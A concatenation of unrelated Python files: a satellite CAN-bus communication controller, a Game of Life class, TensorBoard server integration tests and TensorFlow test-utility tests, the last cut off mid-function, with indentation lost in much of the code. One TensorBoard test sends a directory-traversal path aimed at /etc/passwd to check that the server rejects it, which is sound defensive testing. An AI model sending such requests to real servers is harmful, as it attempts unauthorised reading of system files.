time.sleep(float(self.check_interval))
|
COM_2_MAIN.py
|
##COM 2 Main
## Written with Python v3.6.3 (CPython)
## Satellite Communication Subsystem 2
## Copyright (C) 2017 Jasper Yao, COM2 Subsystem Team,
##
##This program is free software: you can redistribute it and/or modify
##it under the terms of the GNU General Public License as published by
##the Free Software Foundation, either version 3 of the License, or
##(at your option) any later version.
##
##This program is distributed in the hope that it will be useful,
##but WITHOUT ANY WARRANTY; without even the implied warranty of
##MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
##GNU General Public License for more details.
##
##You should have received a copy of the GNU General Public License
##along with this program. If not, see <https://www.gnu.org/licenses/>.
#import cyberdinesys
#cyberdinesys.skynet.activate()
import config
from time import sleep
import time
import subprocess
import threading #Allow multithreading functionality
from MCP25625_api import MCP25625_api, Message #import CAN HAL
import os
#Allow time-dependent interrupt controller
flag1 = threading.Event()
#Prevent Send and Receive from accessing the MCP at the same time
mcp_lock = threading.Lock()
cwd = os.getcwd()
if config.dynamicpathing:
SINEFILEPATH = cwd
else:
SINEFILEPATH = config.SINEFILEPATH_Default # SET THIS # SET THIS
pythonx_radio_process = None
def RF_KILL_formal():
global pythonx_radio_process
if pythonx_radio_process is None:
return
pythonx_radio_process.terminate()
if pythonx_radio_process.returncode is None:
pythonx_radio_process.kill()
pythonx_radio_process = None
return
# A dictionary join for simplification of reference; the (n+1)-th dictionary overwrites the n-th dictionary
commandMap = {**config.py2commandMap, **config.py3commandMap, **config.COM2commandMacroMap}
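# Illustration of the merge precedence (hypothetical entries): with
#   config.py2commandMap       == {0x01: 'tx_sine.py'}
#   config.COM2commandMacroMap == {0x01: RF_KILL_formal}
# the later unpacking wins, so commandMap[0x01] is RF_KILL_formal.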
def run_pyx_file(name, pytype):
global pythonx_radio_process
pythonx_command = pytype +" {}/{} ".format(SINEFILEPATH, name) # launch your python3 script using bash
pythonx_radio_process = subprocess.Popen(pythonx_command.split(), stdout=subprocess.PIPE)
# if not pythonx_radio_process is None:
# output, error = pythonx_radio_process.communicate() # receive output from the python3 script
return
def get_byte_temp():
    cpu_temp_object = open('/sys/class/thermal/thermal_zone0/temp')
    try:
        raw_temp = int(cpu_temp_object.read())
    except Exception:  # Data insurance: fall back to 0 if the reading fails
        print('temp is NAN')
        raw_temp = 0
    cpu_temp_object.close()  # Range of the output temp is (-40, 215)
    b10_temp = round(raw_temp / 1000 + 40)  # Offset so the value fits in a single byte for the CAN buffer
    print("Temp: " + str(raw_temp / 1000) + " Hex: " + hex(b10_temp))
    return b10_temp
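# Worked example (hypothetical reading): raw_temp == 45123 corresponds to
# 45.123 degC; round(45.123 + 40) == 85, so the byte sent is hex(85) == '0x55'.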
#CAN controller Initialization
#There needs to be some kind of event listener daemon? on tap so that this puppy
#can appropriately wait for CAN packets...
##CAN_control()
#Thread 2
#Ten second interrupt
#There is drift in this function, not meant for real time calculations
#Set up object to output
sender = MCP25625_api()
sender.SetFilterIdF0(0x120801F1)
sender.Initialize()
sender.SetNormalMode()
def interrupt_10s():
#print("Interrupt 10s")
# the temperature data to send
global mcp_lock
mcp_lock.acquire()
msg = Message(config.CAN_ID_output_telemetry, [get_byte_temp()]) # , extended_id=False)
try:
sender.Send(msg, timeoutMilliseconds=1000)
print(" SEND: {}".format(msg))
except TimeoutError as e:
print(" SEND: Timeout sending message. <{}>".format(e))
finally:
mcp_lock.release()
threading.Timer(10, interrupt_10s).start()
#Thread 3
#Ten minutes interrupt
##Interrupt behavior needs to be defined.%%
def interrupt_10min():
print("Interrupt 10min")
global flag1
flag1.set()
#thread1.cancl()
def listener():#Target of CAN control thread 1
# initializing CAN message data object and reader
reader = MCP25625_api()
reader.SetFilterIdF0(0x120801F1)
reader.Initialize()
reader.SetNormalMode()
global mcp_lock
while(True):
try:
mcp_lock.acquire()
recvMsg = reader.Recv(timeoutMilliseconds=5000)
except TimeoutError:
print("Loop Timeout: Restarting Loop")
else:
parsePacket(recvMsg)
finally:
mcp_lock.release()
        time.sleep(.005)  # give the other thread a chance to acquire the lock
def parsePacket(msg):
m_id = msg.arbitration_id
if m_id == config.CAN_ID_commands:
try:#RADIO Message "transceiver" command subroutine
possiblecommand = msg.data[0]
commandActual = commandMap[possiblecommand]
RF_KILL_formal()
print("Command " + str(possiblecommand) + ": " + str(commandActual) )
if possiblecommand < config.PYTHON_2_LENGTH:
run_pyx_file(commandActual, "python2")
return #None case: command is macro and is executed
elif possiblecommand < config.PYTHON_3_LENGTH:
run_pyx_file(commandActual, "python3")
#maybe py2 commandlength should be config variable?
elif possiblecommand < config.MACRO_LENGTH:
commandActual()
#This code assumes all m_id=1 events correspond to a python 2.7 file or python 3.6X file or Subsystem Command
except KeyError:
print("Invalid Data")
elif m_id == config.CAN_ID_pictures:
print("Picture data here")
else:
print("Incorrect filter")
#Timer class
##WARNING TIMERS ARE NOT CLOCK BASED, ACCURACY IS NOT GUARANTEED
thread2 = threading.Timer(600, interrupt_10min)
##Repeating 10 second timer
thread3 = threading.Timer(10, interrupt_10s)
thread3.daemon = True
#Init Block
thread2.start()
thread3.start()
thread1 = threading.Thread(name='observer', target=listener)  # pass the function itself, do not call it
thread1.start()
print("CAN controller initialized")
|
conway.py
|
"""PyGoL Game of Life"""
from __future__ import annotations
import multiprocessing as mp
from signal import SIGTERM
from typing import Any, Callable, List, Union
from pygol.utils import Matrix
from .rules import Signature as Rule
from .rules import conways_life, RULES
class Game(Matrix):
"""PyGoL Game simulation class
Parameters
----------
width, height: int
Width and height of the life matrix.
seed: `list` [`list` [`Any`]], optional
Seed or base grid to start the simulation with. Must only contain ``0``
for dead cells and ``1`` for alive cells. When parsing an RLE file this
seed is returned from ``utils.parse_rle.parse()`` as part of the user
environment. If not specified, it defaults to a randomly filled matrix.
wrap: bool, optional
Whether to wrap the matrix around the edges. Defaults to ``True``.
rule: `union` [`Rule Func`, str], optional
Rule string or function to be used to run the simulation. Check the
`game.rules` module to see available rules and rule strings. If not
specified the rule defaults to the standard ``Conway's Game of Life``
rule.
alive, dead: str, optional
Strings used to represent dead and alive cells. If not specified, alive
cells are represented using ``•`` and dead cells using `` ``.
Attributes
----------
matrix: Matrix
Current state of the life grid
wrap: bool
Whether to wrap the life grid around the edges
rule: `callable` [[int, int, Neighbors], int]
Rule to use when running the simulation
out: `callable` [`Pipe`, None]
Display function receiving a pipe end to read the current state of the
game and display it.
charmap: `dict` [`str`, `str`]
Dict containing strings to display dead and alive cells
Examples
--------
Running from an RLE file
>>> from pygol.utils import parse_rle
>>> from pygol.gui import pygame
    >>> conw = Game(**parse_rle("/path/to/seed.rle")).pad(20).pipe(pygame)
>>> conw.run(100)
Running a simulation in the terminal
>>> import os
>>> import time
>>> conw = Game(width=170, height=50)
>>> for i in range(100):
... os.system("clear")
... print(conw)
... conw.tick()
... time.sleep(0.5)
"""
# pylint: disable=too-many-arguments
def __init__(self, width: int, height: int, seed: List[List[Any]] = None,
wrap: bool = True, rule: Union[Rule, str] = conways_life,
alive: str = "•", dead: str = " ") -> Game:
if not seed:
seed = Matrix(width, height).fill_random()
if isinstance(rule, str):
try:
rule = RULES[rule]
except KeyError:
rule = RULES[rule.upper()]
super().__init__(width, height, seed)
self.wrap = wrap
self.rule = rule
self.out = lambda x: None
self.charmap = {
"alive": alive,
"dead": dead
}
def __str__(self) -> str:
res = ""
for row in self:
for col in row:
res += self.charmap["alive"] if col == 1 else self.charmap["dead"]
res += "\n"
return res
def tick(self) -> Game:
"""Advance the simulation by one tick.
Construct a new game state by applying the rule function to all cells.
Returns
-------
self: Game
Returns the game object to allow chaining.
"""
grid = Matrix(self.width, self.height)
nb = self.neighbors
rule = self.rule
for y in range(self.height):
for x in range(self.width):
cell = self[y][x]
neighbors = nb(x, y, wrap=self.wrap)
alive_count = sum([x for x, *_ in neighbors])
grid[y][x] = rule(cell, alive_count, neighbors)
self.matrix = grid
return self
def pipe(self, func: Callable[[mp.Pipe], None]) -> Game:
"""Save a display function.
Parameters
----------
func: `callable` [`Pipe`, None]
Display function receiving a pipe end to read and display to current
game state. See the ``gui`` module for example display functions.
Returns
-------
self: Game
Returns the game object to allow chaining.
Notes
-----
The display function is spawned in a different process using the
``multiprocess`` module. It receives a pipe that it can read and write
to. The pipe can be read using ``pipe.recv()`` and written to using
``pipe.send(payload)``. The display function should only write a
        ``SIGTERM`` signal into the pipe when it is terminated. This signals the
simulation process that it has been terminated, presumably by the user
(e.g. by closing a pygame window).
"""
self.out = func
return self
def run(self, times: int, delay: float = 0.1) -> Game:
"""Run the life simulation and call the display function
Parameters
----------
        times: int
Amount of ticks to run the simulation.
delay: float, optional
Delay between every frame of the simulation. Defaults to ``0.1``
seconds.
Returns
-------
self: Game
Returns the game object to allow chaining.
Notes
-----
The run function first writes the delay into the pipe before running the
simulation and writing the game states to the pipe. The run function
may terminate before having completed the specified number of ticks
if it receives a ``SIGTERM`` signal from the display function.
"""
read, write = mp.Pipe(duplex=True)
display = mp.Process(target=self.out, args=(read,))
display.start()
write.send(delay)
for _ in range(times):
self.tick()
write.send(self)
# Check if display process ended (e.g. user closed window)
if write.poll():
display_ended = write.recv()
if display_ended == SIGTERM:
break
write.send(SIGTERM)
read.close()
display.join()
return self
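# A hedged, minimal sketch (not part of the original module) of the kind of display
# function `pipe()` expects, following the protocol described in the docstrings above:
# read the frame delay first, then read Game states until the simulation signals the
# end of the run. A display that stops early should send SIGTERM back into the pipe.
def _example_terminal_display(pipe) -> None:
    import time
    delay = pipe.recv()                  # first message is the frame delay
    while True:
        frame = pipe.recv()              # subsequent messages are Game states
        if not isinstance(frame, Game):  # run() writes SIGTERM once all ticks are done
            break
        print(frame)
        time.sleep(delay)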
|
server_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for TensorBoard.
These tests start up a full-fledged TensorBoard server.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import gzip
import json
import numbers
import os
import shutil
import tempfile
import threading
import numpy as np
from six import BytesIO
from six.moves import http_client
from six.moves import xrange # pylint: disable=redefined-builtin
from google.protobuf import text_format
from tensorflow.contrib.tensorboard.plugins.projector.projector_config_pb2 import ProjectorConfig
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import summary_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf import saver_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import test
from tensorflow.python.summary import event_multiplexer
from tensorflow.python.summary.writer import writer as writer_lib
from tensorflow.python.training import saver as saver_lib
from tensorflow.tensorboard.backend import server
class TensorboardServerTest(test.TestCase):
_only_use_meta_graph = False # Server data contains only a GraphDef
# Number of scalar-containing events to make.
_SCALAR_COUNT = 99
def setUp(self):
temp_dir = self._GenerateTestData()
self._multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=server.TENSORBOARD_SIZE_GUIDANCE)
server.ReloadMultiplexer(self._multiplexer, {temp_dir: None})
# 0 to pick an unused port.
self._server = server.BuildServer(self._multiplexer, 'localhost', 0,
'/foo/logdir/argument')
self._server_thread = threading.Thread(target=self._server.serve_forever)
self._server_thread.daemon = True
self._server_thread.start()
self._connection = http_client.HTTPConnection(
'localhost', self._server.server_address[1])
def tearDown(self):
self._connection.close()
self._server.shutdown()
self._server.server_close()
def _get(self, path, headers={}):
"""Perform a GET request for the given path."""
self._connection.request('GET', path, None, headers)
return self._connection.getresponse()
def _getJson(self, path):
"""Perform a GET request and decode the result as JSON."""
self._connection.request('GET', path)
response = self._connection.getresponse()
self.assertEqual(response.status, 200)
data = response.read()
if response.getheader('Content-Encoding') == 'gzip':
data = gzip.GzipFile('', 'rb', 9, BytesIO(data)).read()
return json.loads(data.decode('utf-8'))
def testBasicStartup(self):
"""Start the server up and then shut it down immediately."""
pass
def testRequestMainPage(self):
"""Navigate to the main page and verify that it returns a 200."""
response = self._get('/')
self.assertEqual(response.status, 200)
def testRequestNonexistentPage(self):
"""Request a page that doesn't exist; it should 404."""
response = self._get('/asdf')
self.assertEqual(response.status, 404)
def testDirectoryTraversal(self):
"""Attempt a directory traversal attack."""
response = self._get('/..' * 30 + '/etc/passwd')
self.assertEqual(response.status, 400)
def testLogdir(self):
"""Test the format of the data/logdir endpoint."""
parsed_object = self._getJson('/data/logdir')
self.assertEqual(parsed_object, {'logdir': '/foo/logdir/argument'})
def testRuns(self):
"""Test the format of the /data/runs endpoint."""
run_json = self._getJson('/data/runs')
# Don't check the actual timestamp since it's time-dependent.
self.assertTrue(
isinstance(run_json['run1']['firstEventTimestamp'], numbers.Number))
del run_json['run1']['firstEventTimestamp']
self.assertEqual(
run_json,
{
'run1': {
'compressedHistograms': ['histogram'],
'scalars': ['simple_values'],
'histograms': ['histogram'],
'images': ['image'],
'audio': ['audio'],
# if only_use_meta_graph, the graph is extracted from the metagraph
'graph': True,
'meta_graph': self._only_use_meta_graph,
'run_metadata': ['test run']
}
})
def testApplicationPaths_getCached(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/',): # TODO(jart): '/app.js' in open source
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(
response.getheader('Cache-Control'),
'private, max-age=3600',
msg=path)
connection.close()
def testDataPaths_disableAllCaching(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/data/runs', '/data/logdir',
'/data/scalars?run=run1&tag=simple_values',
'/data/scalars?run=run1&tag=simple_values&format=csv',
'/data/images?run=run1&tag=image',
'/data/individualImage?run=run1&tag=image&index=0',
'/data/audio?run=run1&tag=audio',
'/data/run_metadata?run=run1&tag=test%20run'):
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(response.getheader('Expires'), '0', msg=path)
response.read()
connection.close()
def testHistograms(self):
"""Test the format of /data/histograms."""
self.assertEqual(
self._getJson('/data/histograms?tag=histogram&run=run1'),
[[0, 0, [0, 2.0, 3.0, 6.0, 5.0, [0.0, 1.0, 2.0], [1.0, 1.0, 1.0]]]])
def testSampleScalars(self):
"""Test the sample_count parameter of /data/scalars."""
for i in xrange(10, self._SCALAR_COUNT, 10):
samples = self._getJson('/data/scalars?sample_count=%d' % i)
values = samples['run1']['simple_values']
# Verify that we got the right amount of values and that we got the
# endpoints.
self.assertEqual(len(values), i)
self.assertEqual(values[0], [100, 10, 1])
self.assertEqual(values[-1], [9900, 990, 99])
def testSampleScalarsWithLargeSampleCount(self):
"""Test using a large sample_count."""
samples = self._getJson('/data/scalars?sample_count=999999')
values = samples['run1']['simple_values']
self.assertEqual(len(values), self._SCALAR_COUNT)
def testImages(self):
"""Test listing images and retrieving an individual image."""
image_json = self._getJson('/data/images?tag=image&run=run1')
image_query = image_json[0]['query']
# We don't care about the format of the image query.
del image_json[0]['query']
self.assertEqual(image_json, [{
'wall_time': 0,
'step': 0,
'height': 1,
'width': 1
}])
response = self._get('/data/individualImage?%s' % image_query)
self.assertEqual(response.status, 200)
def testAudio(self):
"""Test listing audio and retrieving an individual audio clip."""
audio_json = self._getJson('/data/audio?tag=audio&run=run1')
audio_query = audio_json[0]['query']
# We don't care about the format of the audio query.
del audio_json[0]['query']
self.assertEqual(audio_json, [{
'wall_time': 0,
'step': 0,
'content_type': 'audio/wav'
}])
response = self._get('/data/individualAudio?%s' % audio_query)
self.assertEqual(response.status, 200)
def testGraph(self):
"""Test retrieving the graph definition."""
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs')
self.assertEqual(response.status, 200)
graph_pbtxt = response.read()
# Parse the graph from pbtxt into a graph message.
graph = graph_pb2.GraphDef()
graph = text_format.Parse(graph_pbtxt, graph)
self.assertEqual(len(graph.node), 2)
self.assertEqual(graph.node[0].name, 'a')
self.assertEqual(graph.node[1].name, 'b')
# Make sure the second node has an attribute that was filtered out because
# it was too large and was added to the "too large" attributes list.
self.assertEqual(list(graph.node[1].attr.keys()), ['_very_large_attrs'])
self.assertEqual(graph.node[1].attr['_very_large_attrs'].list.s,
[b'very_large_attr'])
def testProjectorRunsWithEmbeddings(self):
"""Test the format of /runs endpoint of the projector plugin."""
run_json = self._getJson('/data/plugin/projector/runs')
self.assertEqual(run_json, ['run1'])
def testProjectorInfo(self):
"""Test the format of /info endpoint of the projector plugin."""
info_json = self._getJson('/data/plugin/projector/info?run=run1')
self.assertItemsEqual(info_json['embeddings'], [{
'tensorShape': [1, 2],
'tensorName': 'var1'
}, {
'tensorShape': [10, 10],
'tensorName': 'var2'
}, {
'tensorShape': [100, 100],
'tensorName': 'var3'
}])
def testProjectorTensor(self):
"""Test the format of /tensor endpoint of the projector plugin."""
url = '/data/plugin/projector/tensor?run=run1&name=var1'
tensor_bytes = self._get(url).read()
tensor = np.reshape(np.fromstring(tensor_bytes, dtype='float32'), [1, 2])
expected_tensor = np.array([[6, 6]], dtype='float32')
self.assertTrue(np.array_equal(tensor, expected_tensor))
def testAcceptGzip_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptAnyEncoding_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': '*'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptDoodleEncoding_doesNotCompressResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'doodle'})
self.assertEqual(response.status, 200)
self.assertIsNone(response.getheader('Content-Encoding'))
graph = text_format.Parse(response.read(), graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptGzip_doesNotCompressImage(self):
response = self._get('/data/individualImage?run=run1&tag=image&index=0',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), None)
def testRunMetadata(self):
"""Test retrieving the run metadata information."""
response = self._get('/data/run_metadata?run=run1&tag=test%20run')
self.assertEqual(response.status, 200)
run_metadata_pbtxt = response.read()
# Parse from pbtxt into a message.
run_metadata = config_pb2.RunMetadata()
text_format.Parse(run_metadata_pbtxt, run_metadata)
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
self.assertEqual(run_metadata.step_stats.dev_stats[0].device, 'test device')
def _GenerateTestData(self):
"""Generates the test data directory.
The test data has a single run named run1 which contains:
- a histogram
- an image at timestamp and step 0
- scalar events containing the value i at step 10 * i and wall time
100 * i, for i in [1, _SCALAR_COUNT).
- a graph definition
Returns:
temp_dir: The directory the test data is generated under.
"""
temp_dir = tempfile.mkdtemp(prefix=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir)
run1_path = os.path.join(temp_dir, 'run1')
os.makedirs(run1_path)
writer = writer_lib.FileWriter(run1_path)
histogram_value = summary_pb2.HistogramProto(
min=0,
max=2,
num=3,
sum=6,
sum_squares=5,
bucket_limit=[0, 1, 2],
bucket=[1, 1, 1])
# Add a simple graph event.
graph_def = graph_pb2.GraphDef()
node1 = graph_def.node.add()
node1.name = 'a'
node2 = graph_def.node.add()
node2.name = 'b'
node2.attr['very_large_attr'].s = b'a' * 2048 # 2 KB attribute
meta_graph_def = meta_graph_pb2.MetaGraphDef(graph_def=graph_def)
if self._only_use_meta_graph:
writer.add_meta_graph(meta_graph_def)
else:
writer.add_graph(graph_def)
# Add a simple run metadata event.
run_metadata = config_pb2.RunMetadata()
device_stats = run_metadata.step_stats.dev_stats.add()
device_stats.device = 'test device'
writer.add_run_metadata(run_metadata, 'test run')
# 1x1 transparent GIF.
encoded_image = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')
image_value = summary_pb2.Summary.Image(
height=1, width=1, colorspace=1, encoded_image_string=encoded_image)
audio_value = summary_pb2.Summary.Audio(
sample_rate=44100,
length_frames=22050,
num_channels=2,
encoded_audio_string=b'',
content_type='audio/wav')
writer.add_event(
event_pb2.Event(
wall_time=0,
step=0,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='histogram', histo=histogram_value),
summary_pb2.Summary.Value(
tag='image', image=image_value), summary_pb2.Summary.Value(
tag='audio', audio=audio_value)
])))
    # Write _SCALAR_COUNT simple values.
for i in xrange(1, self._SCALAR_COUNT + 1):
writer.add_event(
event_pb2.Event(
# We use different values for wall time, step, and the value so we can
# tell them apart.
wall_time=100 * i,
step=10 * i,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='simple_values', simple_value=i)
])))
writer.flush()
writer.close()
# We assume that the projector is a registered plugin.
self._GenerateProjectorTestData(run1_path)
return temp_dir
def _GenerateProjectorTestData(self, run_path):
# Write a projector config file in run1.
config_path = os.path.join(run_path, 'projector_config.pbtxt')
config = ProjectorConfig()
embedding = config.embeddings.add()
# Add an embedding by its canonical tensor name.
embedding.tensor_name = 'var1:0'
config_pbtxt = text_format.MessageToString(config)
with gfile.GFile(config_path, 'w') as f:
f.write(config_pbtxt)
# Write a checkpoint with some dummy variables.
with ops.Graph().as_default():
sess = session.Session()
checkpoint_path = os.path.join(run_path, 'model')
variable_scope.get_variable(
'var1', [1, 2], initializer=init_ops.constant_initializer(6.0))
variable_scope.get_variable('var2', [10, 10])
variable_scope.get_variable('var3', [100, 100])
sess.run(variables.global_variables_initializer())
saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V1)
saver.save(sess, checkpoint_path)
class TensorboardServerUsingMetagraphOnlyTest(TensorboardServerTest):
# Tests new ability to use only the MetaGraphDef
_only_use_meta_graph = True # Server data contains only a MetaGraphDef
class ParseEventFilesSpecTest(test.TestCase):
def testRunName(self):
logdir_string = 'lol:/cat'
expected = {'/cat': 'lol'}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testPathWithColonThatComesAfterASlash_isNotConsideredARunName(self):
logdir_string = '/lol:/cat'
expected = {'/lol:/cat': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testMultipleDirectories(self):
logdir_string = '/a,/b'
expected = {'/a': None, '/b': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testNormalizesPaths(self):
logdir_string = '/lol/.//cat/../cat'
expected = {'/lol/cat': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testAbsolutifies(self):
logdir_string = 'lol/cat'
expected = {os.path.realpath('lol/cat'): None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testRespectsGCSPath(self):
logdir_string = 'gs://foo/path'
expected = {'gs://foo/path': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testRespectsHDFSPath(self):
logdir_string = 'hdfs://foo/path'
expected = {'hdfs://foo/path': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testDoesNotExpandUserInGCSPath(self):
logdir_string = 'gs://~/foo/path'
expected = {'gs://~/foo/path': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testDoesNotNormalizeGCSPath(self):
logdir_string = 'gs://foo/./path//..'
expected = {'gs://foo/./path//..': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testRunNameWithGCSPath(self):
logdir_string = 'lol:gs://foo/path'
expected = {'gs://foo/path': 'lol'}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
class TensorBoardAssetsTest(test.TestCase):
def testTagFound(self):
tag = resource_loader.load_resource('tensorboard/TAG')
self.assertTrue(tag)
if __name__ == '__main__':
test.main()
|
test_util_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.test_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import threading
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import googletest
class TestUtilTest(test_util.TensorFlowTestCase):
def test_assert_ops_in_graph(self):
with self.test_session():
constant_op.constant(["hello", "taffy"], name="hello")
test_util.assert_ops_in_graph({"hello": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"bye": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"hello": "Variable"}, ops.get_default_graph())
def test_assert_equal_graph_def(self):
with ops.Graph().as_default() as g:
def_empty = g.as_graph_def()
constant_op.constant(5, name="five")
constant_op.constant(7, name="seven")
def_57 = g.as_graph_def()
with ops.Graph().as_default() as g:
constant_op.constant(7, name="seven")
constant_op.constant(5, name="five")
def_75 = g.as_graph_def()
# Comparing strings is order dependent
self.assertNotEqual(str(def_57), str(def_75))
# assert_equal_graph_def doesn't care about order
test_util.assert_equal_graph_def(def_57, def_75)
# Compare two unequal graphs
with self.assertRaisesRegexp(AssertionError,
r"^Found unexpected node 'seven"):
test_util.assert_equal_graph_def(def_57, def_empty)
def testIsGoogleCudaEnabled(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsGoogleCudaEnabled():
print("GoogleCuda is enabled")
else:
print("GoogleCuda is disabled")
def testAssertProtoEqualsStr(self):
graph_str = "node { name: 'w1' op: 'params' }"
graph_def = graph_pb2.GraphDef()
text_format.Merge(graph_str, graph_def)
# test string based comparison
self.assertProtoEquals(graph_str, graph_def)
# test original comparison
self.assertProtoEquals(graph_def, graph_def)
def testAssertProtoEqualsAny(self):
# Test assertProtoEquals with a protobuf.Any field.
meta_graph_def_str = """
meta_info_def {
meta_graph_version: "outer"
any_info {
[type.googleapis.com/tensorflow.MetaGraphDef] {
meta_info_def {
meta_graph_version: "inner"
}
}
}
}
"""
meta_graph_def_outer = meta_graph_pb2.MetaGraphDef()
meta_graph_def_outer.meta_info_def.meta_graph_version = "outer"
meta_graph_def_inner = meta_graph_pb2.MetaGraphDef()
meta_graph_def_inner.meta_info_def.meta_graph_version = "inner"
meta_graph_def_outer.meta_info_def.any_info.Pack(meta_graph_def_inner)
self.assertProtoEquals(meta_graph_def_str, meta_graph_def_outer)
self.assertProtoEquals(meta_graph_def_outer, meta_graph_def_outer)
# Check if the assertion failure message contains the content of
# the inner proto.
with self.assertRaisesRegexp(AssertionError,
r'meta_graph_version: "inner"'):
self.assertProtoEquals("", meta_graph_def_outer)
def testNDArrayNear(self):
a1 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a2 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a3 = np.array([[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]])
self.assertTrue(self._NDArrayNear(a1, a2, 1e-5))
self.assertFalse(self._NDArrayNear(a1, a3, 1e-5))
def testCheckedThreadSucceeds(self):
def noop(ev):
ev.set()
event_arg = threading.Event()
self.assertFalse(event_arg.is_set())
t = self.checkedThread(target=noop, args=(event_arg,))
t.start()
t.join()
self.assertTrue(event_arg.is_set())
def testCheckedThreadFails(self):
def err_func():
return 1 // 0
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("integer division or modulo by zero" in str(fe.exception))
def testCheckedThreadWithWrongAssertionFails(self):
x = 37
def err_func():
self.assertTrue(x < 10)
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("False is not true" in str(fe.exception))
def testMultipleThreadsWithOneFailure(self):
def err_func(i):
self.assertTrue(i != 7)
threads = [
self.checkedThread(
target=err_func, args=(i,)) for i in range(10)
]
for t in threads:
t.start()
for i, t in enumerate(threads):
if i == 7:
with self.assertRaises(self.failureException):
t.join()
else:
t.join()
def _WeMustGoDeeper(self, msg):
with self.assertRaisesOpError(msg):
node_def = ops._NodeDef("op_type", "name")
node_def_orig = ops._NodeDef("op_type_orig", "orig")
op_orig = ops.Operation(node_def_orig, ops.get_default_graph())
